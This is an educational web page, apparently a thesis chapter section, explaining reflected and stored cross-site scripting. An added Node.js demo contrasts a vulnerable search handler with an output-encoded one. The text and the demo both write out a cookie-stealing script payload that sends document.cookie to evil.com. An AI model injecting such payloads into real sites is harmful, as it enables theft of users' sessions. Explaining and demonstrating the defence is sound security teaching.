RobertoBifulco.it

Rich Client Web Applications: the future so near › Chapter III › III.1 Attack Types

III.1.1 Cross Site Scripting (XSS)

Roberto Bifulco — Mon, 02/11/2008 - 15:06

In this attack, an attacker injects a malicious piece of code into an otherwise benign site. There are two types of XSS attack:

  • Reflected XSS

  • Stored XSS

The first is used when the attacker exploits a vulnerable Web Application that displays its input parameters back to the browser. Usually this happens by publishing URLs that contain the attack string. An example is shown next [8]:

http://www.trusted.com/search?keyword=<script>document.images[0].src="http://evil.com/steal?cookie=" + document.cookie; </script>

When someone clicks on this URL, he is forwarded to the trusted.com page, but, because of the vulnerability of this web application, the code contained in the URL will be executed. Let's read this code:

<script>
document.images[0].src="http://evil.com/steal?cookie=" + document.cookie;
</script>

This simple script makes a request to the attacker's web application, sending the user's cookie as a parameter. This way, the attacker collects personal cookies that may contain sensitive information, such as session identifiers.

Stored XSS uses the same strategy, but, instead of URLs, it exploits the possibility of saving content that the web application will show to other users in the future; examples of such applications are wikis and forums.

SOLUTION: XSS is an attack that can be easily avoided if the user input is sanitized. However, it is not so simple to cover all the different sources of threat, and therefore it is not so simple to know how to sanitize input. An interesting XSS cheat list is in [14].
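The reflected-XSS mechanism described above (a search page echoing its keyword parameter) and the sanitization advice in the SOLUTION paragraph, as an added example in Node.js; this is not code from the original page or from the author. The handler and function names, the cookie value and the way the attack URL is assembled are assumptions made for the demo, and the search URL, evil.com host and payload are the ones quoted in the text. The hardened handler encodes the keyword on output for the HTML body context, and the cookie helper shows the HttpOnly flag, which keeps a session cookie out of document.cookie even if an injection succeeds.

```javascript
// Added example (not from the original page): a reflected-XSS demo in Node.js
// showing the vulnerable "echo the search keyword" pattern next to a hardened
// version that HTML-encodes the value before reflecting it.
// Function names, the cookie value and the URL composition are constructed.

// Output encoding for text placed inside an HTML element body. Encoding on
// output (rather than trying to "clean" input) is the reliable defence: every
// character HTML treats specially becomes an entity the browser only displays.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable handler: the keyword is pasted into the page unchanged, so any
// markup carried in the query string becomes part of the page trusted.com serves.
function renderSearchVulnerable(url) {
  const keyword = new URL(url).searchParams.get("keyword") ?? "";
  return `<h1>Results for: ${keyword}</h1>`;
}

// Hardened handler: identical, except the keyword is encoded for HTML context.
function renderSearchSafe(url) {
  const keyword = new URL(url).searchParams.get("keyword") ?? "";
  return `<h1>Results for: ${escapeHtml(keyword)}</h1>`;
}

// Crude check used by the demo: does the rendered page contain a <script>
// element? (A real test would parse the HTML rather than regex it.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Second layer of defence against the cookie-stealing script in the text:
// a cookie flagged HttpOnly is never exposed through document.cookie, so even
// a successful injection cannot read it. Constructed Set-Cookie header value.
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// The attack URL from the text, rebuilt here from its components so that the
// payload survives query-string parsing exactly as the page shows it.
const attackUrl =
  "http://www.trusted.com/search?keyword=" +
  encodeURIComponent(
    '<script>document.images[0].src="http://evil.com/steal?cookie=" + document.cookie;</script>'
  );

console.log("vulnerable:", renderSearchVulnerable(attackUrl));
console.log("hardened:  ", renderSearchSafe(attackUrl));
console.log("Set-Cookie:", sessionCookieHeader("demo-session-id"));
```

Run it with `node` and compare the two rendered lines: the vulnerable one contains a live `<script>` element, the hardened one shows the same characters as inert text. Note that the encoder above is correct only for the HTML body context; a value placed inside an attribute, a URL or a script block needs the encoding rules of that context, which is the "many sources of threat" problem the paragraph refers to.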
